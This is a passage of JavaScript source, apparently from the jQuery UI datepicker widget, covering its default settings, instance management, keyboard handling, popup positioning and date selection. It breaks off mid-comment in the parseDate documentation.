Settings for (groups of) date pickers are maintained in an instance object, allowing multiple different settings on the same page. */ function Datepicker() { this._curInst = null; // The current instance in use this._keyEvent = false; // If the last event was a key event this._disabledInputs = []; // List of date picker inputs that have been disabled this._datepickerShowing = false; // True if the popup picker is showing , false if not this._inDialog = false; // True if showing within a "dialog", false if not this._mainDivId = "ui-datepicker-div"; // The ID of the main datepicker division this._inlineClass = "ui-datepicker-inline"; // The name of the inline marker class this._appendClass = "ui-datepicker-append"; // The name of the append marker class this._triggerClass = "ui-datepicker-trigger"; // The name of the trigger marker class this._dialogClass = "ui-datepicker-dialog"; // The name of the dialog marker class this._disableClass = "ui-datepicker-disabled"; // The name of the disabled covering marker class this._unselectableClass = "ui-datepicker-unselectable"; // The name of the unselectable cell marker class this._currentClass = "ui-datepicker-current-day"; // The name of the current day marker class this._dayOverClass = "ui-datepicker-days-cell-over"; // The name of the day hover marker class this.regional = []; // Available regional settings, indexed by language code this.regional[""] = { // Default regional settings closeText: "Done", // Display text for close link prevText: "Prev", // Display text for previous month link nextText: "Next", // Display text for next month link currentText: "Today", // Display text for current month link monthNames: ["January","February","March","April","May","June", "July","August","September","October","November","December"], // Names of months for drop-down and formatting monthNamesShort: ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], // For formatting dayNames: ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"], // For formatting dayNamesShort: ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"], // For formatting dayNamesMin: ["Su","Mo","Tu","We","Th","Fr","Sa"], // Column headings for days starting at Sunday weekHeader: "Wk", // Column header for week of the year dateFormat: "mm/dd/yy", // See format options on parseDate firstDay: 0, // The first day of the week, Sun = 0, Mon = 1, ... isRTL: false, // True if right-to-left language, false if left-to-right showMonthAfterYear: false, // True if the year select precedes month, false for month then year yearSuffix: "" // Additional text to append to the year in the month headers }; this._defaults = { // Global defaults for all the date picker instances showOn: "focus", // "focus" for popup on focus, // "button" for trigger button, or "both" for either showAnim: "fadeIn", // Name of jQuery animation for popup showOptions: {}, // Options for enhanced animations defaultDate: null, // Used when field is blank: actual date, // +/-number for offset from today, null for today appendText: "", // Display text following the input box, e.g. showing the format buttonText: "...", // Text for trigger button buttonImage: "", // URL for trigger button image buttonImageOnly: false, // True if the image appears alone, false if it appears on a button hideIfNoPrevNext: false, // True to hide next/previous month links // if not applicable, false to just disable them navigationAsDateFormat: false, // True if date formatting applied to prev/today/next links gotoCurrent: false, // True if today link goes back to current selection instead changeMonth: false, // True if month can be selected directly, false if only prev/next changeYear: false, // True if year can be selected directly, false if only prev/next yearRange: "c-10:c+10", // Range of years to display in drop-down, // either relative to today's year (-nn:+nn), relative to currently displayed year // (c-nn:c+nn), absolute (nnnn:nnnn), or a combination of the above (nnnn:-n) showOtherMonths: false, // True to show dates in other months, false to leave blank selectOtherMonths: false, // True to allow selection of dates in other months, false for unselectable showWeek: false, // True to show week of the year, false to not show it calculateWeek: this.iso8601Week, // How to calculate the week of the year, // takes a Date and returns the number of the week for it shortYearCutoff: "+10", // Short year values < this are in the current century, // > this are in the previous century, // string value starting with "+" for current year + value minDate: null, // The earliest selectable date, or null for no limit maxDate: null, // The latest selectable date, or null for no limit duration: "fast", // Duration of display/closure beforeShowDay: null, // Function that takes a date and returns an array with // [0] = true if selectable, false if not, [1] = custom CSS class name(s) or "", // [2] = cell title (optional), e.g. $.datepicker.noWeekends beforeShow: null, // Function that takes an input field and // returns a set of custom settings for the date picker onSelect: null, // Define a callback function when a date is selected onChangeMonthYear: null, // Define a callback function when the month or year is changed onClose: null, // Define a callback function when the datepicker is closed numberOfMonths: 1, // Number of months to show at a time showCurrentAtPos: 0, // The position in multipe months at which to show the current month (starting at 0) stepMonths: 1, // Number of months to step back/forward stepBigMonths: 12, // Number of months to step back/forward for the big links altField: "", // Selector for an alternate field to store selected dates into altFormat: "", // The date format to use for the alternate field constrainInput: true, // The input is constrained by the current date format showButtonPanel: false, // True to show button panel, false to not show it autoSize: false, // True to size the input for the date format, false to leave as is disabled: false // The initial disabled state }; $.extend(this._defaults, this.regional[""]); this.regional.en = $.extend( true, {}, this.regional[ "" ]); this.regional[ "en-US" ] = $.extend( true, {}, this.regional.en ); this.dpDiv = datepicker_bindHover($("<div id='" + this._mainDivId + "' class='ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all'></div>")); } $.extend(Datepicker.prototype, { /* Class name added to elements to indicate already configured with a date picker. */ markerClassName: "hasDatepicker", //Keep track of the maximum number of rows displayed (see #7043) maxRows: 4, // TODO rename to "widget" when switching to widget factory _widgetDatepicker: function() { return this.dpDiv; }, /* Override the default settings for all instances of the date picker. * @param settings object - the new settings to use as defaults (anonymous object) * @return the manager object */ setDefaults: function(settings) { datepicker_extendRemove(this._defaults, settings || {}); return this; }, /* Attach the date picker to a jQuery selection. * @param target element - the target input field or division or span * @param settings object - the new settings to use for this date picker instance (anonymous) */ _attachDatepicker: function(target, settings) { var nodeName, inline, inst; nodeName = target.nodeName.toLowerCase(); inline = (nodeName === "div" || nodeName === "span"); if (!target.id) { this.uuid += 1; target.id = "dp" + this.uuid; } inst = this._newInst($(target), inline); inst.settings = $.extend({}, settings || {}); if (nodeName === "input") { this._connectDatepicker(target, inst); } else if (inline) { this._inlineDatepicker(target, inst); } }, /* Create a new instance object. */ _newInst: function(target, inline) { var id = target[0].id.replace(/([^A-Za-z0-9_\-])/g, "\\\\$1"); // escape jQuery meta chars return {id: id, input: target, // associated target selectedDay: 0, selectedMonth: 0, selectedYear: 0, // current selection drawMonth: 0, drawYear: 0, // month being drawn inline: inline, // is datepicker inline or not dpDiv: (!inline ? this.dpDiv : // presentation div datepicker_bindHover($("<div class='" + this._inlineClass + " ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all'></div>")))}; }, /* Attach the date picker to an input field. */ _connectDatepicker: function(target, inst) { var input = $(target); inst.append = $([]); inst.trigger = $([]); if (input.hasClass(this.markerClassName)) { return; } this._attachments(input, inst); input.addClass(this.markerClassName).keydown(this._doKeyDown). keypress(this._doKeyPress).keyup(this._doKeyUp); this._autoSize(inst); $.data(target, "datepicker", inst); //If disabled option is true, disable the datepicker once it has been attached to the input (see ticket #5665) if( inst.settings.disabled ) { this._disableDatepicker( target ); } }, /* Make attachments based on settings. */ _attachments: function(input, inst) { var showOn, buttonText, buttonImage, appendText = this._get(inst, "appendText"), isRTL = this._get(inst, "isRTL"); if (inst.append) { inst.append.remove(); } if (appendText) { inst.append = $("<span class='" + this._appendClass + "'>" + appendText + "</span>"); input[isRTL ? "before" : "after"](inst.append); } input.unbind("focus", this._showDatepicker); if (inst.trigger) { inst.trigger.remove(); } showOn = this._get(inst, "showOn"); if (showOn === "focus" || showOn === "both") { // pop-up date picker when in the marked field input.focus(this._showDatepicker); } if (showOn === "button" || showOn === "both") { // pop-up date picker when button clicked buttonText = this._get(inst, "buttonText"); buttonImage = this._get(inst, "buttonImage"); inst.trigger = $(this._get(inst, "buttonImageOnly") ? $("<img/>").addClass(this._triggerClass). attr({ src: buttonImage, alt: buttonText, title: buttonText }) : $("<button type='button'></button>").addClass(this._triggerClass). html(!buttonImage ? buttonText : $("<img/>").attr( { src:buttonImage, alt:buttonText, title:buttonText }))); input[isRTL ? "before" : "after"](inst.trigger); inst.trigger.click(function() { if ($.datepicker._datepickerShowing && $.datepicker._lastInput === input[0]) { $.datepicker._hideDatepicker(); } else if ($.datepicker._datepickerShowing && $.datepicker._lastInput !== input[0]) { $.datepicker._hideDatepicker(); $.datepicker._showDatepicker(input[0]); } else { $.datepicker._showDatepicker(input[0]); } return false; }); } }, /* Apply the maximum length for the date format. */ _autoSize: function(inst) { if (this._get(inst, "autoSize") && !inst.inline) { var findMax, max, maxI, i, date = new Date(2009, 12 - 1, 20), // Ensure double digits dateFormat = this._get(inst, "dateFormat"); if (dateFormat.match(/[DM]/)) { findMax = function(names) { max = 0; maxI = 0; for (i = 0; i < names.length; i++) { if (names[i].length > max) { max = names[i].length; maxI = i; } } return maxI; }; date.setMonth(findMax(this._get(inst, (dateFormat.match(/MM/) ? "monthNames" : "monthNamesShort")))); date.setDate(findMax(this._get(inst, (dateFormat.match(/DD/) ? "dayNames" : "dayNamesShort"))) + 20 - date.getDay()); } inst.input.attr("size", this._formatDate(inst, date).length); } }, /* Attach an inline date picker to a div. */ _inlineDatepicker: function(target, inst) { var divSpan = $(target); if (divSpan.hasClass(this.markerClassName)) { return; } divSpan.addClass(this.markerClassName).append(inst.dpDiv); $.data(target, "datepicker", inst); this._setDate(inst, this._getDefaultDate(inst), true); this._updateDatepicker(inst); this._updateAlternate(inst); //If disabled option is true, disable the datepicker before showing it (see ticket #5665) if( inst.settings.disabled ) { this._disableDatepicker( target ); } // Set display:block in place of inst.dpDiv.show() which won't work on disconnected elements // http://bugs.jqueryui.com/ticket/7552 - A Datepicker created on a detached div has zero height inst.dpDiv.css( "display", "block" ); }, /* Pop-up the date picker in a "dialog" box. * @param input element - ignored * @param date string or Date - the initial date to display * @param onSelect function - the function to call when a date is selected * @param settings object - update the dialog date picker instance's settings (anonymous object) * @param pos int[2] - coordinates for the dialog's position within the screen or * event - with x/y coordinates or * leave empty for default (screen centre) * @return the manager object */ _dialogDatepicker: function(input, date, onSelect, settings, pos) { var id, browserWidth, browserHeight, scrollX, scrollY, inst = this._dialogInst; // internal instance if (!inst) { this.uuid += 1; id = "dp" + this.uuid; this._dialogInput = $("<input type='text' id='" + id + "' style='position: absolute; top: -100px; width: 0px;'/>"); this._dialogInput.keydown(this._doKeyDown); $("body").append(this._dialogInput); inst = this._dialogInst = this._newInst(this._dialogInput, false); inst.settings = {}; $.data(this._dialogInput[0], "datepicker", inst); } datepicker_extendRemove(inst.settings, settings || {}); date = (date && date.constructor === Date ? this._formatDate(inst, date) : date); this._dialogInput.val(date); this._pos = (pos ? (pos.length ? pos : [pos.pageX, pos.pageY]) : null); if (!this._pos) { browserWidth = document.documentElement.clientWidth; browserHeight = document.documentElement.clientHeight; scrollX = document.documentElement.scrollLeft || document.body.scrollLeft; scrollY = document.documentElement.scrollTop || document.body.scrollTop; this._pos = // should use actual width/height below [(browserWidth / 2) - 100 + scrollX, (browserHeight / 2) - 150 + scrollY]; } // move input on screen for focus, but hidden behind dialog this._dialogInput.css("left", (this._pos[0] + 20) + "px").css("top", this._pos[1] + "px"); inst.settings.onSelect = onSelect; this._inDialog = true; this.dpDiv.addClass(this._dialogClass); this._showDatepicker(this._dialogInput[0]); if ($.blockUI) { $.blockUI(this.dpDiv); } $.data(this._dialogInput[0], "datepicker", inst); return this; }, /* Detach a datepicker from its control. * @param target element - the target input field or division or span */ _destroyDatepicker: function(target) { var nodeName, $target = $(target), inst = $.data(target, "datepicker"); if (!$target.hasClass(this.markerClassName)) { return; } nodeName = target.nodeName.toLowerCase(); $.removeData(target, "datepicker"); if (nodeName === "input") { inst.append.remove(); inst.trigger.remove(); $target.removeClass(this.markerClassName). unbind("focus", this._showDatepicker). unbind("keydown", this._doKeyDown). unbind("keypress", this._doKeyPress). unbind("keyup", this._doKeyUp); } else if (nodeName === "div" || nodeName === "span") { $target.removeClass(this.markerClassName).empty(); } }, /* Enable the date picker to a jQuery selection. * @param target element - the target input field or division or span */ _enableDatepicker: function(target) { var nodeName, inline, $target = $(target), inst = $.data(target, "datepicker"); if (!$target.hasClass(this.markerClassName)) { return; } nodeName = target.nodeName.toLowerCase(); if (nodeName === "input") { target.disabled = false; inst.trigger.filter("button"). each(function() { this.disabled = false; }).end(). filter("img").css({opacity: "1.0", cursor: ""}); } else if (nodeName === "div" || nodeName === "span") { inline = $target.children("." + this._inlineClass); inline.children().removeClass("ui-state-disabled"); inline.find("select.ui-datepicker-month, select.ui-datepicker-year"). prop("disabled", false); } this._disabledInputs = $.map(this._disabledInputs, function(value) { return (value === target ? null : value); }); // delete entry }, /* Disable the date picker to a jQuery selection. * @param target element - the target input field or division or span */ _disableDatepicker: function(target) { var nodeName, inline, $target = $(target), inst = $.data(target, "datepicker"); if (!$target.hasClass(this.markerClassName)) { return; } nodeName = target.nodeName.toLowerCase(); if (nodeName === "input") { target.disabled = true; inst.trigger.filter("button"). each(function() { this.disabled = true; }).end(). filter("img").css({opacity: "0.5", cursor: "default"}); } else if (nodeName === "div" || nodeName === "span") { inline = $target.children("." + this._inlineClass); inline.children().addClass("ui-state-disabled"); inline.find("select.ui-datepicker-month, select.ui-datepicker-year"). prop("disabled", true); } this._disabledInputs = $.map(this._disabledInputs, function(value) { return (value === target ? null : value); }); // delete entry this._disabledInputs[this._disabledInputs.length] = target; }, /* Is the first field in a jQuery collection disabled as a datepicker? * @param target element - the target input field or division or span * @return boolean - true if disabled, false if enabled */ _isDisabledDatepicker: function(target) { if (!target) { return false; } for (var i = 0; i < this._disabledInputs.length; i++) { if (this._disabledInputs[i] === target) { return true; } } return false; }, /* Retrieve the instance data for the target control. * @param target element - the target input field or division or span * @return object - the associated instance data * @throws error if a jQuery problem getting data */ _getInst: function(target) { try { return $.data(target, "datepicker"); } catch (err) { throw "Missing instance data for this datepicker"; } }, /* Update or retrieve the settings for a date picker attached to an input field or division. * @param target element - the target input field or division or span * @param name object - the new settings to update or * string - the name of the setting to change or retrieve, * when retrieving also "all" for all instance settings or * "defaults" for all global defaults * @param value any - the new value for the setting * (omit if above is an object or to retrieve a value) */ _optionDatepicker: function(target, name, value) { var settings, date, minDate, maxDate, inst = this._getInst(target); if (arguments.length === 2 && typeof name === "string") { return (name === "defaults" ? $.extend({}, $.datepicker._defaults) : (inst ? (name === "all" ? $.extend({}, inst.settings) : this._get(inst, name)) : null)); } settings = name || {}; if (typeof name === "string") { settings = {}; settings[name] = value; } if (inst) { if (this._curInst === inst) { this._hideDatepicker(); } date = this._getDateDatepicker(target, true); minDate = this._getMinMaxDate(inst, "min"); maxDate = this._getMinMaxDate(inst, "max"); datepicker_extendRemove(inst.settings, settings); // reformat the old minDate/maxDate values if dateFormat changes and a new minDate/maxDate isn't provided if (minDate !== null && settings.dateFormat !== undefined && settings.minDate === undefined) { inst.settings.minDate = this._formatDate(inst, minDate); } if (maxDate !== null && settings.dateFormat !== undefined && settings.maxDate === undefined) { inst.settings.maxDate = this._formatDate(inst, maxDate); } if ( "disabled" in settings ) { if ( settings.disabled ) { this._disableDatepicker(target); } else { this._enableDatepicker(target); } } this._attachments($(target), inst); this._autoSize(inst); this._setDate(inst, date); this._updateAlternate(inst); this._updateDatepicker(inst); } }, // change method deprecated _changeDatepicker: function(target, name, value) { this._optionDatepicker(target, name, value); }, /* Redraw the date picker attached to an input field or division. * @param target element - the target input field or division or span */ _refreshDatepicker: function(target) { var inst = this._getInst(target); if (inst) { this._updateDatepicker(inst); } }, /* Set the dates for a jQuery selection. * @param target element - the target input field or division or span * @param date Date - the new date */ _setDateDatepicker: function(target, date) { var inst = this._getInst(target); if (inst) { this._setDate(inst, date); this._updateDatepicker(inst); this._updateAlternate(inst); } }, /* Get the date(s) for the first entry in a jQuery selection. * @param target element - the target input field or division or span * @param noDefault boolean - true if no default date is to be used * @return Date - the current date */ _getDateDatepicker: function(target, noDefault) { var inst = this._getInst(target); if (inst && !inst.inline) { this._setDateFromField(inst, noDefault); } return (inst ? this._getDate(inst) : null); }, /* Handle keystrokes. */ _doKeyDown: function(event) { var onSelect, dateStr, sel, inst = $.datepicker._getInst(event.target), handled = true, isRTL = inst.dpDiv.is(".ui-datepicker-rtl"); inst._keyEvent = true; if ($.datepicker._datepickerShowing) { switch (event.keyCode) { case 9: $.datepicker._hideDatepicker(); handled = false; break; // hide on tab out case 13: sel = $("td." + $.datepicker._dayOverClass + ":not(." + $.datepicker._currentClass + ")", inst.dpDiv); if (sel[0]) { $.datepicker._selectDay(event.target, inst.selectedMonth, inst.selectedYear, sel[0]); } onSelect = $.datepicker._get(inst, "onSelect"); if (onSelect) { dateStr = $.datepicker._formatDate(inst); // trigger custom callback onSelect.apply((inst.input ? inst.input[0] : null), [dateStr, inst]); } else { $.datepicker._hideDatepicker(); } return false; // don't submit the form case 27: $.datepicker._hideDatepicker(); break; // hide on escape case 33: $.datepicker._adjustDate(event.target, (event.ctrlKey ? -$.datepicker._get(inst, "stepBigMonths") : -$.datepicker._get(inst, "stepMonths")), "M"); break; // previous month/year on page up/+ ctrl case 34: $.datepicker._adjustDate(event.target, (event.ctrlKey ? +$.datepicker._get(inst, "stepBigMonths") : +$.datepicker._get(inst, "stepMonths")), "M"); break; // next month/year on page down/+ ctrl case 35: if (event.ctrlKey || event.metaKey) { $.datepicker._clearDate(event.target); } handled = event.ctrlKey || event.metaKey; break; // clear on ctrl or command +end case 36: if (event.ctrlKey || event.metaKey) { $.datepicker._gotoToday(event.target); } handled = event.ctrlKey || event.metaKey; break; // current on ctrl or command +home case 37: if (event.ctrlKey || event.metaKey) { $.datepicker._adjustDate(event.target, (isRTL ? +1 : -1), "D"); } handled = event.ctrlKey || event.metaKey; // -1 day on ctrl or command +left if (event.originalEvent.altKey) { $.datepicker._adjustDate(event.target, (event.ctrlKey ? -$.datepicker._get(inst, "stepBigMonths") : -$.datepicker._get(inst, "stepMonths")), "M"); } // next month/year on alt +left on Mac break; case 38: if (event.ctrlKey || event.metaKey) { $.datepicker._adjustDate(event.target, -7, "D"); } handled = event.ctrlKey || event.metaKey; break; // -1 week on ctrl or command +up case 39: if (event.ctrlKey || event.metaKey) { $.datepicker._adjustDate(event.target, (isRTL ? -1 : +1), "D"); } handled = event.ctrlKey || event.metaKey; // +1 day on ctrl or command +right if (event.originalEvent.altKey) { $.datepicker._adjustDate(event.target, (event.ctrlKey ? +$.datepicker._get(inst, "stepBigMonths") : +$.datepicker._get(inst, "stepMonths")), "M"); } // next month/year on alt +right break; case 40: if (event.ctrlKey || event.metaKey) { $.datepicker._adjustDate(event.target, +7, "D"); } handled = event.ctrlKey || event.metaKey; break; // +1 week on ctrl or command +down default: handled = false; } } else if (event.keyCode === 36 && event.ctrlKey) { // display the date picker on ctrl+home $.datepicker._showDatepicker(this); } else { handled = false; } if (handled) { event.preventDefault(); event.stopPropagation(); } }, /* Filter entered characters - based on date format. */ _doKeyPress: function(event) { var chars, chr, inst = $.datepicker._getInst(event.target); if ($.datepicker._get(inst, "constrainInput")) { chars = $.datepicker._possibleChars($.datepicker._get(inst, "dateFormat")); chr = String.fromCharCode(event.charCode == null ? event.keyCode : event.charCode); return event.ctrlKey || event.metaKey || (chr < " " || !chars || chars.indexOf(chr) > -1); } }, /* Synchronise manual entry and field/alternate field. */ _doKeyUp: function(event) { var date, inst = $.datepicker._getInst(event.target); if (inst.input.val() !== inst.lastVal) { try { date = $.datepicker.parseDate($.datepicker._get(inst, "dateFormat"), (inst.input ? inst.input.val() : null), $.datepicker._getFormatConfig(inst)); if (date) { // only if valid $.datepicker._setDateFromField(inst); $.datepicker._updateAlternate(inst); $.datepicker._updateDatepicker(inst); } } catch (err) { } } return true; }, /* Pop-up the date picker for a given input field. * If false returned from beforeShow event handler do not show. * @param input element - the input field attached to the date picker or * event - if triggered by focus */ _showDatepicker: function(input) { input = input.target || input; if (input.nodeName.toLowerCase() !== "input") { // find from button/image trigger input = $("input", input.parentNode)[0]; } if ($.datepicker._isDisabledDatepicker(input) || $.datepicker._lastInput === input) { // already here return; } var inst, beforeShow, beforeShowSettings, isFixed, offset, showAnim, duration; inst = $.datepicker._getInst(input); if ($.datepicker._curInst && $.datepicker._curInst !== inst) { $.datepicker._curInst.dpDiv.stop(true, true); if ( inst && $.datepicker._datepickerShowing ) { $.datepicker._hideDatepicker( $.datepicker._curInst.input[0] ); } } beforeShow = $.datepicker._get(inst, "beforeShow"); beforeShowSettings = beforeShow ? beforeShow.apply(input, [input, inst]) : {}; if(beforeShowSettings === false){ return; } datepicker_extendRemove(inst.settings, beforeShowSettings); inst.lastVal = null; $.datepicker._lastInput = input; $.datepicker._setDateFromField(inst); if ($.datepicker._inDialog) { // hide cursor input.value = ""; } if (!$.datepicker._pos) { // position below input $.datepicker._pos = $.datepicker._findPos(input); $.datepicker._pos[1] += input.offsetHeight; // add the height } isFixed = false; $(input).parents().each(function() { isFixed |= $(this).css("position") === "fixed"; return !isFixed; }); offset = {left: $.datepicker._pos[0], top: $.datepicker._pos[1]}; $.datepicker._pos = null; //to avoid flashes on Firefox inst.dpDiv.empty(); // determine sizing offscreen inst.dpDiv.css({position: "absolute", display: "block", top: "-1000px"}); $.datepicker._updateDatepicker(inst); // fix width for dynamic number of date pickers // and adjust position before showing offset = $.datepicker._checkOffset(inst, offset, isFixed); inst.dpDiv.css({position: ($.datepicker._inDialog && $.blockUI ? "static" : (isFixed ? "fixed" : "absolute")), display: "none", left: offset.left + "px", top: offset.top + "px"}); if (!inst.inline) { showAnim = $.datepicker._get(inst, "showAnim"); duration = $.datepicker._get(inst, "duration"); inst.dpDiv.css( "z-index", datepicker_getZindex( $( input ) ) + 1 ); $.datepicker._datepickerShowing = true; if ( $.effects && $.effects.effect[ showAnim ] ) { inst.dpDiv.show(showAnim, $.datepicker._get(inst, "showOptions"), duration); } else { inst.dpDiv[showAnim || "show"](showAnim ? duration : null); } if ( $.datepicker._shouldFocusInput( inst ) ) { inst.input.focus(); } $.datepicker._curInst = inst; } }, /* Generate the date picker content. */ _updateDatepicker: function(inst) { this.maxRows = 4; //Reset the max number of rows being displayed (see #7043) datepicker_instActive = inst; // for delegate hover events inst.dpDiv.empty().append(this._generateHTML(inst)); this._attachHandlers(inst); var origyearshtml, numMonths = this._getNumberOfMonths(inst), cols = numMonths[1], width = 17, activeCell = inst.dpDiv.find( "." + this._dayOverClass + " a" ); if ( activeCell.length > 0 ) { datepicker_handleMouseover.apply( activeCell.get( 0 ) ); } inst.dpDiv.removeClass("ui-datepicker-multi-2 ui-datepicker-multi-3 ui-datepicker-multi-4").width(""); if (cols > 1) { inst.dpDiv.addClass("ui-datepicker-multi-" + cols).css("width", (width * cols) + "em"); } inst.dpDiv[(numMonths[0] !== 1 || numMonths[1] !== 1 ? "add" : "remove") + "Class"]("ui-datepicker-multi"); inst.dpDiv[(this._get(inst, "isRTL") ? "add" : "remove") + "Class"]("ui-datepicker-rtl"); if (inst === $.datepicker._curInst && $.datepicker._datepickerShowing && $.datepicker._shouldFocusInput( inst ) ) { inst.input.focus(); } // deffered render of the years select (to avoid flashes on Firefox) if( inst.yearshtml ){ origyearshtml = inst.yearshtml; setTimeout(function(){ //assure that inst.yearshtml didn't change. if( origyearshtml === inst.yearshtml && inst.yearshtml ){ inst.dpDiv.find("select.ui-datepicker-year:first").replaceWith(inst.yearshtml); } origyearshtml = inst.yearshtml = null; }, 0); } }, // #6694 - don't focus the input if it's already focused // this breaks the change event in IE // Support: IE and jQuery <1.9 _shouldFocusInput: function( inst ) { return inst.input && inst.input.is( ":visible" ) && !inst.input.is( ":disabled" ) && !inst.input.is( ":focus" ); }, /* Check positioning to remain on screen. */ _checkOffset: function(inst, offset, isFixed) { var dpWidth = inst.dpDiv.outerWidth(), dpHeight = inst.dpDiv.outerHeight(), inputWidth = inst.input ? inst.input.outerWidth() : 0, inputHeight = inst.input ? inst.input.outerHeight() : 0, viewWidth = document.documentElement.clientWidth + (isFixed ? 0 : $(document).scrollLeft()), viewHeight = document.documentElement.clientHeight + (isFixed ? 0 : $(document).scrollTop()); offset.left -= (this._get(inst, "isRTL") ? (dpWidth - inputWidth) : 0); offset.left -= (isFixed && offset.left === inst.input.offset().left) ? $(document).scrollLeft() : 0; offset.top -= (isFixed && offset.top === (inst.input.offset().top + inputHeight)) ? $(document).scrollTop() : 0; // now check if datepicker is showing outside window viewport - move to a better place if so. offset.left -= Math.min(offset.left, (offset.left + dpWidth > viewWidth && viewWidth > dpWidth) ? Math.abs(offset.left + dpWidth - viewWidth) : 0); offset.top -= Math.min(offset.top, (offset.top + dpHeight > viewHeight && viewHeight > dpHeight) ? Math.abs(dpHeight + inputHeight) : 0); return offset; }, /* Find an object's position on the screen. */ _findPos: function(obj) { var position, inst = this._getInst(obj), isRTL = this._get(inst, "isRTL"); while (obj && (obj.type === "hidden" || obj.nodeType !== 1 || $.expr.filters.hidden(obj))) { obj = obj[isRTL ? "previousSibling" : "nextSibling"]; } position = $(obj).offset(); return [position.left, position.top]; }, /* Hide the date picker from view. * @param input element - the input field attached to the date picker */ _hideDatepicker: function(input) { var showAnim, duration, postProcess, onClose, inst = this._curInst; if (!inst || (input && inst !== $.data(input, "datepicker"))) { return; } if (this._datepickerShowing) { showAnim = this._get(inst, "showAnim"); duration = this._get(inst, "duration"); postProcess = function() { $.datepicker._tidyDialog(inst); }; // DEPRECATED: after BC for 1.8.x $.effects[ showAnim ] is not needed if ( $.effects && ( $.effects.effect[ showAnim ] || $.effects[ showAnim ] ) ) { inst.dpDiv.hide(showAnim, $.datepicker._get(inst, "showOptions"), duration, postProcess); } else { inst.dpDiv[(showAnim === "slideDown" ? "slideUp" : (showAnim === "fadeIn" ? "fadeOut" : "hide"))]((showAnim ? duration : null), postProcess); } if (!showAnim) { postProcess(); } this._datepickerShowing = false; onClose = this._get(inst, "onClose"); if (onClose) { onClose.apply((inst.input ? inst.input[0] : null), [(inst.input ? inst.input.val() : ""), inst]); } this._lastInput = null; if (this._inDialog) { this._dialogInput.css({ position: "absolute", left: "0", top: "-100px" }); if ($.blockUI) { $.unblockUI(); $("body").append(this.dpDiv); } } this._inDialog = false; } }, /* Tidy up after a dialog display. */ _tidyDialog: function(inst) { inst.dpDiv.removeClass(this._dialogClass).unbind(".ui-datepicker-calendar"); }, /* Close date picker if clicked elsewhere. */ _checkExternalClick: function(event) { if (!$.datepicker._curInst) { return; } var $target = $(event.target), inst = $.datepicker._getInst($target[0]); if ( ( ( $target[0].id !== $.datepicker._mainDivId && $target.parents("#" + $.datepicker._mainDivId).length === 0 && !$target.hasClass($.datepicker.markerClassName) && !$target.closest("." + $.datepicker._triggerClass).length && $.datepicker._datepickerShowing && !($.datepicker._inDialog && $.blockUI) ) ) || ( $target.hasClass($.datepicker.markerClassName) && $.datepicker._curInst !== inst ) ) { $.datepicker._hideDatepicker(); } }, /* Adjust one of the date sub-fields. */ _adjustDate: function(id, offset, period) { var target = $(id), inst = this._getInst(target[0]); if (this._isDisabledDatepicker(target[0])) { return; } this._adjustInstDate(inst, offset + (period === "M" ? this._get(inst, "showCurrentAtPos") : 0), // undo positioning period); this._updateDatepicker(inst); }, /* Action for current link. */ _gotoToday: function(id) { var date, target = $(id), inst = this._getInst(target[0]); if (this._get(inst, "gotoCurrent") && inst.currentDay) { inst.selectedDay = inst.currentDay; inst.drawMonth = inst.selectedMonth = inst.currentMonth; inst.drawYear = inst.selectedYear = inst.currentYear; } else { date = new Date(); inst.selectedDay = date.getDate(); inst.drawMonth = inst.selectedMonth = date.getMonth(); inst.drawYear = inst.selectedYear = date.getFullYear(); } this._notifyChange(inst); this._adjustDate(target); }, /* Action for selecting a new month/year. */ _selectMonthYear: function(id, select, period) { var target = $(id), inst = this._getInst(target[0]); inst["selected" + (period === "M" ? "Month" : "Year")] = inst["draw" + (period === "M" ? "Month" : "Year")] = parseInt(select.options[select.selectedIndex].value,10); this._notifyChange(inst); this._adjustDate(target); }, /* Action for selecting a day. */ _selectDay: function(id, month, year, td) { var inst, target = $(id); if ($(td).hasClass(this._unselectableClass) || this._isDisabledDatepicker(target[0])) { return; } inst = this._getInst(target[0]); inst.selectedDay = inst.currentDay = $("a", td).html(); inst.selectedMonth = inst.currentMonth = month; inst.selectedYear = inst.currentYear = year; this._selectDate(id, this._formatDate(inst, inst.currentDay, inst.currentMonth, inst.currentYear)); }, /* Erase the input field and hide the date picker. */ _clearDate: function(id) { var target = $(id); this._selectDate(target, ""); }, /* Update the input field with the selected date. */ _selectDate: function(id, dateStr) { var onSelect, target = $(id), inst = this._getInst(target[0]); dateStr = (dateStr != null ? dateStr : this._formatDate(inst)); if (inst.input) { inst.input.val(dateStr); } this._updateAlternate(inst); onSelect = this._get(inst, "onSelect"); if (onSelect) { onSelect.apply((inst.input ? inst.input[0] : null), [dateStr, inst]); // trigger custom callback } else if (inst.input) { inst.input.trigger("change"); // fire the change event } if (inst.inline){ this._updateDatepicker(inst); } else { this._hideDatepicker(); this._lastInput = inst.input[0]; if (typeof(inst.input[0]) !== "object") { inst.input.focus(); // restore focus } this._lastInput = null; } }, /* Update any alternate field to synchronise with the main field. */ _updateAlternate: function(inst) { var altFormat, date, dateStr, altField = this._get(inst, "altField"); if (altField) { // update alternate field too altFormat = this._get(inst, "altFormat") || this._get(inst, "dateFormat"); date = this._getDate(inst); dateStr = this.formatDate(altFormat, date, this._getFormatConfig(inst)); $(altField).each(function() { $(this).val(dateStr); }); } }, /* Set as beforeShowDay function to prevent selection of weekends. * @param date Date - the date to customise * @return [boolean, string] - is this date selectable?, what is its CSS class? */ noWeekends: function(date) { var day = date.getDay(); return [(day > 0 && day < 6), ""]; }, /* Set as calculateWeek to determine the week of the year based on the ISO 8601 definition. * @param date Date - the date to get the week for * @return number - the number of the week within the year that contains this date */ iso8601Week: function(date) { var time, checkDate = new Date(date.getTime()); // Find Thursday of this week starting on Monday checkDate.setDate(checkDate.getDate() + 4 - (checkDate.getDay() || 7)); time = checkDate.getTime(); checkDate.setMonth(0); // Compare with Jan 1 checkDate.setDate(1); return Math.floor(Math.round((time - checkDate) / 86400000) / 7) + 1; }, /* Parse a string value into a date object. * See formatDate below for the possible formats. * * @param format string - the expected format of the date * @param value string - the date in the above format * @param settings Object - attributes include: * shortYearCutoff number - the cutoff year for determining the century (optional) * dayNamesShort string[7] - abbreviated names of the days from Sunday (optional) * dayNames string[7] - names of the days from Sunday (optional) * monthNamesShort string[12] - abbreviated names of the months (optional) * monthNames string[12] - 